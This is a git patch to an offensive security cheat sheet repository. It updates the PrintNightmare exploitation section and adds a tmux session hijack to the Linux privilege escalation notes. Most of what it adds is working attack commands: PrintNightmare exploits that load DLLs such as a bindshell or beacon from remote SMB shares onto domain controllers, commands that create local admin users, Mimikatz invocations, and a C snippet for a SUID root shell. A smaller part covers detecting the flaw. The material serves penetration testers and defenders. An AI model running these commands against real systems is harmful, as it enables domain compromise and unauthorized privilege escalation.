From 175c676f1e61d095101dba6884eb6a996f34f9b5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 12 Jul 2021 14:42:18 +0200 Subject: [PATCH] Tmux PrivEsc + PrintNightmare update --- .../Active Directory Attack.md | 91 ++++++++++++------- .../Linux - Privilege Escalation.md | 21 ++++- 2 files changed, 78 insertions(+), 34 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 56a4bab..913822a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -12,8 +12,8 @@ - [Most common paths to AD compromise](#most-common-paths-to-ad-compromise) - [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability) - [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc) - - [CVE-2020-1472 ZeroLogon](#cve-2020-1472-zerologon) - - [CVE-2021-1675 PrintNightmare](#cve-2021-1675-printnightmare) + - [ZeroLogon](#zerologon) + - [PrintNightmare](#printnightmare) - [Open Shares](#open-shares) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) @@ -506,7 +506,9 @@ Windows> net time /domain /set > Sometimes you will find a Domain Controller without the latest patches installed, use the newest CVE to gain a SYSTEM shell on it. If you have a "normal user" shell on the DC you can also try to elevate your privileges using one of the methods listed in [Windows - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) -#### CVE-2020-1472 ZeroLogon +#### ZeroLogon + +> CVE-2020-1472 White Paper from Secura : https://www.secura.com/pathtoimg.php?id=2055 @@ -578,7 +580,9 @@ Exploit steps from the white paper lsadump::postzerologon /target:10.10.10.10 /account:DC01$ ``` -#### CVE-2021-1675 - CVE-2021-34527 - PrintNightmare +#### PrintNightmare + +> CVE-2021-1675 / CVE-2021-34527 The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. The exploit will execute the DLL either from the local filesystem or a remote share. @@ -591,39 +595,59 @@ Requirements: * Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0 -```powershell -# https://github.com/cube0x0/CVE-2021-1675 - require a modified Impacket: https://github.com/cube0x0/impacket -python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' -python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' -## LPE -SharpPrintNightmare.exe C:\addCube.dll -## RCE using existing context -SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' -## RCE using runas /netonly -SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 +**Detect the vulnerability**: +* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) + ```ps1 + python3 ./rpcdump.py @10.0.2.10 | grep MS-RPRN + Protocol: [MS-RPRN]: Print System Remote Protocol + ``` +* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream) + ```ps1 + git clone https://github.com/byt3bl33d3r/ItWasAllADream + cd ItWasAllADream && poetry install && poetry shell + itwasalladream -u user -p password -d domain 192.168.1.0/24 + ``` -# https://github.com/calebstewart/CVE-2021-1675 -## LPE only (PS1 + DLL) -Import-Module .\cve-2021-1675.ps1 -Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default -Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" -Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" +**Trigger the exploit**: -# Mimikatz - https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210705 -## LPE -misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll -## RCE -misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 +**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` -# It Was All A Dream - https://github.com/byt3bl33d3r/ItWasAllADream -# PrintNightmare scanner/checker (no exploit) -## RCE only -git clone https://github.com/byt3bl33d3r/ItWasAllADream -cd ItWasAllADream && poetry install && poetry shell -itwasalladream -u user -p password -d domain 192.168.1.0/24 -``` +* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) + ```powershell + # require a modified Impacket: https://github.com/cube0x0/impacket + python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' + python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' + ## LPE + SharpPrintNightmare.exe C:\addCube.dll + ## RCE using existing context + SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' + ## RCE using runas /netonly + SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 + ``` +* [Invoke-Nightmare](https://github.com/calebstewart/CVE-2021-1675) + ```powershell + ## LPE only (PS1 + DLL) + Import-Module .\cve-2021-1675.ps1 + Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default + Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" + Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" + ``` +* [Mimikatz v2.2.0-20210709+](https://github.com/gentilkiwi/mimikatz/releases) + ```powershell + ## LPE + misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll + ## RCE + misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 + ``` + +**Debug informations** + +| Error | Message | Debug | +|--------|---------------------|------------------------------------------| +| 0x5 | rpc_s_access_denied | Permissions on the file in the SMB share | +| 0x525 | ERROR_NO_SUCH_USER | The specified account does not exist. | +| 0x180 | unknown error code | Share is not SMB2 | -**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109) . ### Open Shares @@ -2770,3 +2794,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) * [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work) +* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index a03a217..46dcc56 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -41,6 +41,7 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) +* [Hijack TMUX session](#hijack-tmux-session) * [Kernel Exploits](#kernel-exploits) * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) @@ -328,6 +329,13 @@ find / -uid 0 -perm -4000 -type f 2>/dev/null ### Create a SUID binary +| Function | Description | +|------------|---| +| setreuid() | sets real and effective user IDs of the calling process | +| setuid() | sets the effective user ID of the calling process | +| setgid() | sets the effective group ID of the calling process | + + ```bash print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c gcc -o /tmp/suid /tmp/suid.c @@ -340,7 +348,7 @@ sudo chmod +s /tmp/suid # setuid bit ### List capabilities of binaries -```bash +```powershell ╭─swissky@lab ~ ╰─$ /usr/bin/getcap -r /usr/bin /usr/bin/fping = cap_net_raw+ep @@ -737,6 +745,17 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root + +## Hijack TMUX session + +Require a read access to the tmux socket : `/tmp/tmux-1000/default`. + +```powershell +export TMUX=/tmp/tmux-1000/default,1234,0 +tmux ls +``` + + ## Kernel Exploits Precompiled exploits can be found inside these repositories, run them at your own risk !